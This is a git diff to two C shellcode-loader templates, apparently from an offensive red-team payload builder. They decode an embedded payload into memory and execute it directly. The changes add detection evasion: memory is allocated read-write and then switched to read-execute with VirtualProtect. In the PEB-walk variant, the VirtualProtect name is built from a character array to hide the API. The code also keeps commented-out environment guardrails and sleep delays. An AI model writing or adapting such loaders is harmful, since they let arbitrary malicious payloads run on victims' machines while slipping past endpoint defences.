diff --git a/data/source/carrier/iat_reuse/template.c b/data/source/carrier/iat_reuse/template.c index 44939c0..0a89701 100644 --- a/data/source/carrier/iat_reuse/template.c +++ b/data/source/carrier/iat_reuse/template.c @@ -21,8 +21,6 @@ int sleep_ms(DWORD sleeptime) { int main() { - //sleep_ms(10000); - // Execution Guardrail: Env Check //wchar_t envVarName[] = {'U','S','E','R','P','R','O','F','I','L','E', 0}; //wchar_t tocheck[] = {'C',':','\\','U','s','e','r','s','\\','h','a','c','k','e','r', 0}; // L"C:\\Users\\hacker" @@ -39,13 +37,18 @@ int main() // Allocate 1 // char *dest = ... - char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x40); + char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x04); // rw + + //sleep_ms(10000); // Copy (and decode) // from: supermega_payload[] // to: dest[] {{ plugin_decoder }} + if (VirtualProtect(dest, {{PAYLOAD_LEN}}, 0x20, &result) == 0) { // rx + return 7; + } // Execute *dest (*(void(*)())(dest))(); diff --git a/data/source/carrier/peb_walk/template.c b/data/source/carrier/peb_walk/template.c index 839e702..4829a3c 100644 --- a/data/source/carrier/peb_walk/template.c +++ b/data/source/carrier/peb_walk/template.c @@ -84,7 +84,9 @@ int main() _In_ DWORD flAllocationType, _In_ DWORD flProtect)) _GetProcAddress((HMODULE)base, VirtualAlloc_str); if (_VirtualAlloc == NULL) return 4; - char *dest = _VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x40); + char *dest = _VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x04); // rw + + //sleep_ms(10000); // Copy // from: supermega_payload[] @@ -92,6 +94,21 @@ int main() // len: 0x11223344 {{ plugin_decoder }} + + // ntdll.dll: VirtualAlloc() + char VirtualProtect_str[] = { 'V','i','r','t','u','a','l','P','r','o','t','e', 'c', 't', 0 }; + LPVOID (WINAPI * _VirtualProtect)( + _In_ LPVOID lpAddress, + _In_ SIZE_T dwSize, + _In_ DWORD flNewProtect, + _Out_ PDWORD lpflOldProtect) = (LPVOID (WINAPI*)( + _In_ LPVOID lpAddress, + _In_ SIZE_T dwSize, + _In_ DWORD flNewProtect, + _Out_ PDWORD lpflOldProtect)) _GetProcAddress((HMODULE)base, VirtualProtect_str); + if (_VirtualProtect == NULL) return 4; + _VirtualProtect(dest, {{PAYLOAD_LEN}}, 0x20, &result); // rx + // Execute *dest (*(void(*)())(dest))();